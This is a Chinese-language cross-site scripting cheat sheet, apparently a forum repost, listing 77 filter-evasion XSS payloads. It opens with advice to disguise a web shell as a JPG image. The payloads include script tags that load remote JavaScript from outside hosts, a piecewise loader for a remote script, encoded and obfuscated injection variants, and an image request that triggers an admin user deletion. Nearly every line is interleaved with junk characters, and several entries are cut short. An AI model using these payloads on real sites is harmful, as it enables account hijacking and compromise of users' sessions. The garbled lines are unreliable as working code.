跨站图片shell
1 G# ^0 G$ X4 u- P: t4 @4 GXSS跨站代码 <script>alert("")</script>$ p# }. j$ R, t7 T, M+ f9 x
, o- O4 U; o4 Z/ K
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马! y* {; H9 I; r/ D- E+ J( h& F" n
2 v! S. d2 X# f/ Y+ f F
- b; l* K" j- j' J' J
5 g9 B5 Y9 i% @" L1)普通的XSS JavaScript注入
6 V! M# y9 c& [# l [<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 R7 O3 ` [3 A( g) Y
4 O$ `7 j; [9 }" W1 U! K2 ]6 V z(2)IMG标签XSS使用JavaScript命令& J$ |6 o4 }; z$ I- o
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 o8 B4 X. D' d- Q/ Y
% u- K, m1 x8 w! Y0 w5 o(3)IMG标签无分号无引号
7 x* K8 C. v4 T. N<IMG SRC=javascript:alert(‘XSS’)>
- } f" y) Z2 o" ~& X( {* g$ T- W$ }
(4)IMG标签大小写不敏感" ~. ^! E: D, U* z; F3 j
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>6 o3 D- i; b/ y- `2 j4 {. m$ q* \
* q* W$ ^5 B1 U. l+ l1 h" f6 ] e2 f
(5)HTML编码(必须有分号)
; p* H8 v) |( u<IMG SRC=javascript:alert(“XSS”)>9 _# u% r% k5 o7 q" i6 Q( ]
. B* f: y* L# c. s/ T/ l. k(6)修正缺陷IMG标签; {9 ^6 N8 z# t8 W) `: S4 Q' a
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 X8 T4 t3 x/ Z$ r' z0 u, X% @% Z9 e
(7)formCharCode标签(计算器)1 r# C' k) N% P
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>6 J7 O6 k3 I+ m# U* h+ C: n
& R0 T6 E0 d. n7 Y: _' K1 ?(8)UTF-8的Unicode编码(计算器)
F+ J2 }& N" |<IMG SRC=jav..省略..S')>
# P" q! [1 b- K( c" n/ W* }# S, D: C, o( o% b
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
q; P+ F) p0 V4 d<IMG SRC=jav..省略..S')>% x$ @( O, F |0 J
7 j0 E; d, q! F# b: ~- ^1 l- _. v
(10)十六进制编码也是没有分号(计算器)
' k5 x: {) b4 B& w: \$ C& s$ H# S<IMG SRC=java..省略..XSS')>5 w0 E l# t7 u0 r# O" C6 q
+ C) H( I& a) _
(11)嵌入式标签,将Javascript分开
' N/ v- ?4 G: d, N0 I7 N: i; L% _<IMG SRC=”jav ascript:alert(‘XSS’);”>) O y8 n- @: M6 z% x6 `" L2 J
7 C( B& ~) X. n; x! i(12)嵌入式编码标签,将Javascript分开
2 D7 m3 E( p- [1 L/ L+ j3 n* a<IMG SRC=”jav ascript:alert(‘XSS’);”>3 e7 P6 j# f% `! |/ c
8 O* T" z9 g3 n0 ~' }$ ]( C- {: A8 l
(13)嵌入式换行符
4 |+ L/ v0 q# j: r<IMG SRC=”jav ascript:alert(‘XSS’);”>
( U) m1 [0 g, _, U8 q6 w V9 `* _" A
(14)嵌入式回车* v+ s: J0 ]" A, ~, J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
) N/ v9 ]; U+ o7 Z1 N; q4 _ S; {+ ~* q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子! y/ ?$ Z5 w/ A; T
<IMG SRC=”javascript:alert(‘XSS‘)”>6 a6 M) k% J$ E% O# `2 \
/ E+ m5 c g* C2 c( i# ^
(16)解决限制字符(要求同页面)
7 f/ m, S% v2 W1 G5 j<script>z=’document.’</script>2 M; t/ I: |& ?- p% Z; j9 {8 g1 w
<script>z=z+’write(“‘</script>
; h8 h3 e7 b+ K C! l& ^( p<script>z=z+’<script’</script>8 ]! S$ p) C. w! H' o1 x. l0 G
<script>z=z+’ src=ht’</script>+ q8 L7 x% L" J8 k( }+ y+ M2 ]% {
<script>z=z+’tp://ww’</script>3 S; l3 i& d) {2 q5 Q, ?6 t
<script>z=z+’w.shell’</script>
! Q3 p, } I+ c6 F# w3 P" F<script>z=z+’.net/1.’</script>7 g) P- `: [" k
<script>z=z+’js></sc’</script>
* F3 J. d. g0 n: i* A9 {<script>z=z+’ript>”)’</script>0 E* ^: Y* l' Y- I
<script>eval_r(z)</script>
- s2 ?5 U1 T! b. w0 A; ]
" ^ k; x) U# x5 o(17)空字符
5 @; B; _9 e) w$ `- R! @' ~perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
% w! p `6 a7 W* J7 H4 ^5 c+ @) C
. l9 [! T; g4 U: c(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用* o: b/ S- y9 r3 i, u
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ `+ A% m& o8 y- r& b2 R+ V
L' |- ?5 A8 y$ L8 b' ?2 r/ y4 l8 G+ ?(19)Spaces和meta前的IMG标签0 ?' B2 A2 r+ f3 z" E F
<IMG SRC=” javascript:alert(‘XSS’);”>
' z+ [" y" L0 w) E: y2 _0 @; v% b' Y8 ~
(20)Non-alpha-non-digit XSS
5 ^" |1 A2 v+ k<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 Z0 i5 R( ]; U9 [0 {: A" B* o
) H9 s, ?* V2 `+ N5 z& [
(21)Non-alpha-non-digit XSS to 2
; x5 y2 Q8 ~0 r: J; Y+ X<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>6 d6 P& _" {, i9 o7 t
( R! S3 ?$ b# E1 G. Q
(22)Non-alpha-non-digit XSS to 3
+ c: b5 i0 }( w- E# C, i<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& C' x T+ u+ x: e' g! j& A0 ]% P2 w! j' z
(23)双开括号
/ w: w! @( Q2 t. Z5 ] y9 a# O! E<<SCRIPT>alert(“XSS”);//<</SCRIPT>. f* B7 p/ b6 @( b( f" `6 o5 C
% ^7 t" o, |. n& H7 b$ n/ W
(24)无结束脚本标记(仅火狐等浏览器)
3 A) P1 M3 b* n( F" `<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
3 Q7 s. H& Q# O1 {; ]. [6 k. q3 T$ ?# [( G
(25)无结束脚本标记2
+ a. q: s0 {) h8 l<SCRIPT SRC=//3w.org/XSS/xss.js>& C3 e" \6 r, r: M; I
1 r% e7 ?1 m3 ?
(26)半开的HTML/JavaScript XSS
! q* O2 V, r# Q2 J" a<IMG SRC=”javascript:alert(‘XSS’)”
7 ]5 U, K6 c6 d! n4 ^4 I- z1 P" y0 d* x
(27)双开角括号3 O% Z5 w2 f- r5 V4 K& I
<iframe src=http://3w.org/XSS.html <) n p4 R0 b/ Y' }% Z8 M/ Y. e2 F
1 J6 @; y! [; a
(28)无单引号 双引号 分号7 o5 c7 m$ [9 g2 ^1 t/ \
<SCRIPT>a=/XSS/
$ @9 ^5 U. ^* [- r9 D; {alert(a.source)</SCRIPT>( |$ b7 W. w2 ~6 W% f; v
% q0 q( m F$ |) u' m
(29)换码过滤的JavaScript. ]5 r4 K8 |9 q; q
\”;alert(‘XSS’);//
$ c; T: X! Q0 J1 R/ }1 P! K
+ H6 o% E5 s K8 G& X$ |9 O" y(30)结束Title标签4 k, J( u. g/ L& m4 v2 R
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>4 ]5 P4 ~8 B. y) _, m1 K( S+ ]
- I5 S, S9 o. k) x% D& n(31)Input Image' D. G% x" t2 d7 O; Y5 C2 z
<INPUT SRC=”javascript:alert(‘XSS’);”>/ W# T+ S; _/ t
* V! r2 Z# `: v8 c$ {' N- f(32)BODY Image) M1 ]: T; Y. n- O& t
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 S; ?6 q) A- t& V
$ D a9 z8 ^/ A! w8 x$ {. v(33)BODY标签. v* A( b. F/ C7 \) C( |
<BODY(‘XSS’)>
U2 E% K/ @# W0 q: N+ Y
, O7 d' \: w2 Z: @: }$ o! q2 y(34)IMG Dynsrc. B3 Q; `2 \/ }
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
$ P* C, t& ?2 u- H# T; F9 n# E
- f, S2 ~2 s* Q4 J# T(35)IMG Lowsrc
/ D0 A' g" r0 E6 C( w* I, R, X<IMG LOWSRC=”javascript:alert(‘XSS’)”>
' @ g' O: S' u3 \; G U
& ~. k+ l8 {5 f9 A(36)BGSOUND7 Y, o6 s) `" G* ?3 t( C4 D: i
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 C- f5 S( k9 h% D5 n
: e/ C9 J1 X5 V! @6 T(37)STYLE sheet% `, P! e @( H# s2 G; H4 l2 ^
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> W$ C% }% q, F1 E
8 Z) k. L& R5 Z% m3 a9 _$ o
(38)远程样式表
( v$ R; `5 m8 r$ s$ T. v<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
7 n* X* N0 [" O9 F/ R$ G$ J
3 [, L* B# I4 Y/ C) m4 r(39)List-style-image(列表式)
/ ?! D9 e) o* u: S# L$ h2 h/ T1 M<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS+ c9 \: U; W$ m( J2 p
& u- w0 Y9 ^. v4 v(40)IMG VBscript
! [8 H9 \! a( H8 w. O. J' ]! Q<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
& H: {: g) j0 U' j" N" d9 i
# A; N2 P" I' j% g' L(41)META链接url
% z7 ?, {: w. @" e# r( g<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
@% Y6 Q) Y# R* d7 I) c( ^; p' I% N
(42)Iframe
$ k/ f p" Y% [$ z<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 D$ S7 o( P0 w9 M o7 e(43)Frame
4 R6 F7 L4 p1 _( w7 d<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>' F" ?8 x# m+ s8 K% B( u
7 B7 v& P8 ~* }0 `
(44)Table
( x" `" o0 ]% R( A2 x<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
8 p, B& ~9 g: v: e a! j
, e, K, m5 G0 l& k7 s, x4 ~ T _6 A(45)TD- R3 T& v0 m8 r( M
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>8 b* h7 d1 ^- n6 [5 o0 H8 `
! N4 ~0 |; ^' r; I6 _- c(46)DIV background-image+ K/ i) m! K- c5 V) E! W; b# |" }5 ]
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> J) ~6 g+ u3 K6 o% G0 D4 s4 q7 @
! @' I: {/ G' ]( N(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)+ m8 A+ {6 F3 [& T7 m5 U
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>8 q" F) c5 p! A
- J: i8 b4 n f7 @" _: g2 ^/ [(48)DIV expression& q+ c- c" u( e* K7 v$ Q3 p3 D
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, N, V9 f S; _8 s5 A
1 a/ T& X% C, L/ b(49)STYLE属性分拆表达" X$ b$ k& v2 V
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ K9 g7 z8 X# t5 I5 U- t' h! ?& d
C) G8 W) d8 r7 x; ^# i' H(50)匿名STYLE(组成:开角号和一个字母开头) F# @9 s; Z5 `
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
, B1 Y, A2 Z U; Z1 D1 U
: m0 j M E! d( m- |5 O(51)STYLE background-image# i4 f. M4 I) O" `5 f- c
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
* c3 Q5 E* g$ e6 s7 @6 m6 h- C; i
' S6 a- l, L+ p- @: c(52)IMG STYLE方式+ t3 P8 ?' Q6 b, [0 ~) Z- E
exppression(alert(“XSS”))’>
6 h2 k% ^, y& \/ S" v1 i( [% R
6 g- a0 ~" s& o6 M$ R(53)STYLE background) t# h: m; ?! x
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>% H6 i1 f1 n) V" F* q L
, l) ?2 ]" Q* w D7 u' W! U' ^(54)BASE9 Y: K, p6 F. o, F" F6 m& m
<BASE HREF=”javascript:alert(‘XSS’);//”>
3 I3 v5 o: o1 i9 T- v/ {
* z, g. Y! r; x(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS5 S" ]/ U! @* B3 H% Y
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>' K. ~/ e1 \% G' R/ _
; r7 a+ e6 w+ q: G$ f
(56)在flash中使用ActionScrpt可以混进你XSS的代码. O- q: H% M- O; w) P
a=”get”;; S- C6 ~; Z: R7 J8 |7 ^
b=”URL(\”";
6 Z/ ~6 \7 P- o; r! ?8 r: e$ Lc=”javascript:”;/ y; d3 e) W! p1 e* R$ @/ N c
d=”alert(‘XSS’);\”)”;
: r' L6 }# F" m1 G/ O) Z: d4 Z7 {, P2 F ]eval_r(a+b+c+d);. _5 H _6 w0 _2 N" Z, ~
2 `- T; ]* j# v1 l8 B(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上$ \6 I0 E- n* m$ F- O: \
<HTML xmlns:xss>& K0 y2 X5 j. w9 Q: t7 K6 \
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>' i, ?$ u. b. X% L( X* v* B
<xss:xss>XSS</xss:xss>: e3 h- a0 Q8 `/ r4 x" r i. L* F
</HTML>+ g3 v* K. }1 r5 d# m) o
1 j0 N8 x; M. s8 z& H% T$ f$ H(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
( a7 T( z4 F; x<SCRIPT SRC=””></SCRIPT>
$ L; `7 B8 N/ k0 N9 l& H( k0 _; W7 h/ Z2 \; F$ l V" |: m
(59)IMG嵌入式命令,可执行任意命令
# x* i6 Y5 s; S; { [7 U+ R<IMG SRC=”http://www.XXX.com/a.php?a=b”>
! u4 k. `4 ~) H& h
. I9 c1 ?; J( n! e9 f# W(60)IMG嵌入式命令(a.jpg在同服务器)
! U6 G, Z/ a" w E* yRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser+ d- S4 N0 z' [1 Y5 A
5 c5 {; q6 W0 U(61)绕符号过滤 i: [3 C, T: E5 q4 U6 z
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' E1 @$ M! C) ?0 |* ~& L( y4 Y0 G
/ B& D+ }, \' B4 R% }4 t(62)
: s# `+ J. k6 l) O6 M8 M: h<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 B/ o$ Y: P: m
. j& z- R# L g$ A! J. B
(63)
d9 X" \" B2 L( A4 v<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>/ [0 {9 I: H1 U. e2 y* E
% f# V" R' }, C& g(64)7 p- C* ?, K) _. N! w
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 u: {( K) O7 c, B* e4 o9 {, G
* h8 [# }' u7 f& o G3 @+ D1 b
(65)$ F& A& s* l- a3 k, N: }
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
1 ^7 u+ X' C( C! T2 G/ b& P. S5 v3 f/ _* n! M) G5 n& S2 T
(66)
* c7 n r# E. H7 h0 g<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
! ~2 Q/ a& p5 S5 i, `0 [( D2 z* F! u& \. u% b' \9 q
(67)
# U5 ~" m. B9 S<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>' s) i" j+ N. R1 M5 z+ g0 `
. t P. W3 s8 b4 v4 b6 I
(68)URL绕行
8 ?9 z" p; Y( ^9 T<A HREF=”http://127.0.0.1/”>XSS</A>
3 i( E* ?& m* T+ |
" d7 ~; U+ V; W6 O(69)URL编码0 Y' X1 L# @; d, Q$ g
<A HREF=”http://3w.org”>XSS</A>
; s- P; P3 p% m! u6 N
- K4 v" B# \ {(70)IP十进制 n* C# @5 g8 H, U# y
<A HREF=”http://3232235521″>XSS</A>! F1 F- [& P6 l& V4 d7 r6 u
/ X4 _+ n/ T. s+ W8 Q0 j3 z(71)IP十六进制& n# m8 x3 R7 }# s# ]3 B
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A> P% o. C8 q* d b& ~1 i8 {
& K' \. Z- s8 }' j" N
(72)IP八进制
q( O( J. E( l, G0 y1 ~+ H. v<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ V6 I! D c2 x7 q& ~
1 [/ J% T7 g1 s Y. v! G. o) b) r8 T
(73)混合编码* H, L" u& v# X- r
<A HREF=”h
4 ^( F# A5 ]- v! dtt p://6 6.000146.0×7.147/”">XSS</A>
$ b& Y9 F6 K' ~) w4 T' D) p
1 ?! g: b4 U% X0 G! g(74)节省[http:]
9 t+ [+ a+ \/ ~$ B/ \: k<A HREF=”//www.google.com/”>XSS</A>
/ _( k* {9 t6 g( V
& N5 l/ N6 c, U9 z(75)节省[www]. U1 S# M& |- F( B
<A HREF=”http://google.com/”>XSS</A>7 T+ h5 A; b8 \( [
& q2 m5 T3 P- j7 _9 ?* J+ S" h$ V
(76)绝对点绝对DNS4 ~. ~# |& _+ s; G' ?& y3 F
<A HREF=”http://www.google.com./”>XSS</A>
7 d3 g, P6 B5 F( @+ `8 l4 Z B
" k& r% p4 d+ Y* W1 a(77)javascript链接
/ X. A" B2 Q. { ~8 G<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>$ e* F7 |4 U+ T
|